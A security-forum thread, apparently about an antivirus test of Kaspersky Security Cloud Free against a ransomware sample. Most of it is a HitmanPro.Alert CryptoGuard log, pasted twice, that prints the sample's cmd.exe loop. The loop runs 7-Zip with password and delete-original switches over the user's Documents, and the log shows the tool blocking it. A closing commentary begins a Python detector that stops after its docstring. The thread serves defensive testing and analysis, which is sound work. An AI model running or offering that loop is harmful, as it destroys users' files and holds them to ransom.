App Review Kaspersky Security Cloud Free vs Ransominator (default settings)

It is advised to take all reviews with a grain of salt. In extreme cases some reviews use dramatization for entertainment purposes.

bayasdev



Kaspersky users: don't worry, you're already using a strong AV, this is just the 0day bypassing XYZ AV show, avoid running unknown files and stay safe!

Edit: typo

This test shows how an antivirus behaves with certain threats, in a specific environment and under certain conditions.
We encourage you to compare these results with others and take informed decisions on what security products to use.
Before buying an antivirus you should consider factors such as price, ease of use, compatibility, and support. Installing a free trial version allows an antivirus to be tested in everyday use before purchase.
 

CyberTech

Well, I was tired that I chose a good free AV and some bad ones; it was complicated. I'm better off staying with WD and OSA. I think it's all alright because I don't use any Office files (doc, pdf, etc.). I think I would try using H_C instead of OSA (outdated, no update since then).
 

Vitali Ortzi

Log Name: Application
Source: HitmanPro.Alert
Date: 27/04/2020 0:43:03
Event ID: 911
Task Category: Mitigation
Level: Error
Keywords: Classic
User: N/A
Computer: DESKTOP-9TB3DOM
Description:
Mitigation CryptoGuard
Timestamp 2020-04-26T21:43:03

Platform 10.0.17763/x64 v871 06_17%
PID 4132
Application C:\Program Files\7-Zip\7z.exe
Created 2020-03-17T07:34:42
Description 7-Zip Console 18.6

Filename C:\Program Files\7-Zip\7z.exe

Detection Generic.Ransom.C

1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Created L0, Write T8620544 H8620196|^259 #1,2

2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip
Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1

3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 #3

4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #4

5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #5

6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #6

7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #7

8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened, Deleted L19238769 P4984 #9

9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3
Created L0, Write T19239424 H19239254|^236 P4984 #10,11

10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10

11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12

12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13

13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14

14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15

15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16

16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened, Deleted L4372785 P3368 #18

17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T4373504 H4373093|^306 P3368 #19,20

18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19

25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T5794304 H5793920|^251 P1504 #28,29

26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip
Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28

33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3
Created L0, Write T5743104 H5743005|^277 P5240 #38,39

34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip
Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38



Loaded Modules (23)
-----------------------------------------------------------------------------
0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov),
Version: 18.6.0.0
00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.),
Version: 3.8.4.871
00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation),
Version: 10.0.17763.1158
000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation),
Version: 14.2.5536.2100
000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation),
Version: 17.2.1.16
00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation),
Version: 10.0.17763.1131
00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation),
Version: 7.0.17763.475
00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation),
Version: 10.0.17763.1075
00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation),
Version: 10.0.17763.864
00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation),
Version: 10.0.17763.914
00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation),
Version: 10.0.17763.719
00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation),
Version: 10.0.17763.678
00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation),
Version: 10.0.17763.592
00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation),
Version: 10.0.17763.719
000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov),
Version: 18.6.0.0

Process Trace
1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents
2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"
3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57
4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07
5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s
6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56
winlogon.exe
7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms
\SystemRoot\System32\smss.exe 000000dc 00000084
8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29
\SystemRoot\System32\smss.exe

Dropped Files
1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]
1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]

Thumbprints
5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c

Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="HitmanPro.Alert" />
<EventID Qualifiers="0">911</EventID>
<Level>2</Level>
<Task>9</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-04-26T21:43:03.542132400Z" />
<EventRecordID>9047</EventRecordID>
<Channel>Application</Channel>
<Computer>DESKTOP-9TB3DOM</Computer>
<Security />
</System>
<EventData>
<Data>C:\Program Files\7-Zip\7z.exe</Data>
<Data>CryptoGuard</Data>
<Data>Mitigation CryptoGuard
Timestamp 2020-04-26T21:43:03

Platform 10.0.17763/x64 v871 06_17%
PID 4132
Application C:\Program Files\7-Zip\7z.exe
Created 2020-03-17T07:34:42
Description 7-Zip Console 18.6

Filename C:\Program Files\7-Zip\7z.exe

Detection Generic.Ransom.C

1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Created L0, Write T8620544 H8620196|^259 #1,2

2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip
Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1

3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 #3

4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #4

5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #5

6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #6

7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 #7

8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened, Deleted L19238769 P4984 #9

9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3
Created L0, Write T19239424 H19239254|^236 P4984 #10,11

10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip
Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10

11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat
Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12

12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13

13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14

14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15

15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16

16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened, Deleted L4372785 P3368 #18

17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T4373504 H4373093|^306 P3368 #19,20

18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip
Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19

25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3
Created L0, Write T5794304 H5793920|^251 P1504 #28,29

26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip
Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28

33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3
Created L0, Write T5743104 H5743005|^277 P5240 #38,39

34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip
Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38



Loaded Modules (23)
-----------------------------------------------------------------------------
0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov),
Version: 18.6.0.0
00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.),
Version: 3.8.4.871
00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation),
Version: 10.0.17763.1158
000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation),
Version: 14.2.5536.2100
000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation),
Version: 17.2.1.16
00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation),
Version: 10.0.17763.1131
00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation),
Version: 7.0.17763.475
00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation),
Version: 10.0.17763.1075
00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation),
Version: 10.0.17763.864
00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation),
Version: 10.0.17763.914
00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation),
Version: 10.0.17763.719
00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation),
Version: 10.0.17763.678
00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation),
Version: 10.0.17763.1
00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation),
Version: 10.0.17763.592
00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation),
Version: 10.0.17763.1158
00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation),
Version: 10.0.17763.719
000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov),
Version: 18.6.0.0

Process Trace
1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03
"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents
2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57
C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"
3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57
4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07
5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s
6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56
winlogon.exe
7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms
\SystemRoot\System32\smss.exe 000000dc 00000084
8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29
\SystemRoot\System32\smss.exe

Dropped Files
1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3
Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]
1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]
27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db
Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]

Thumbprints
5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c
</Data>
</EventData>
</Event>
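The CryptoGuard report above shows a legitimate archiver (7z.exe, started through a cmd.exe for-loop by InventarioBodega.exe) being driven with -sdel and -p so that each document is replaced by a password-protected copy carrying a new suffix. The Python below is an added example, not code from the post or from HitmanPro.Alert: it scores a process command line for that archiver-as-encryptor pattern and pairs CryptoGuard file entries to count how many originals were replaced by renamed copies. The archiver names, the extension list and every sample line are constructed assumptions that only mimic the report's format.

```python
"""Added example (not from the forum post or from HitmanPro.Alert):
flag an archiver being driven as a file encryptor, the pattern visible in
the CryptoGuard report above. All names, lists and sample lines below are
constructed assumptions that mimic the report's format."""
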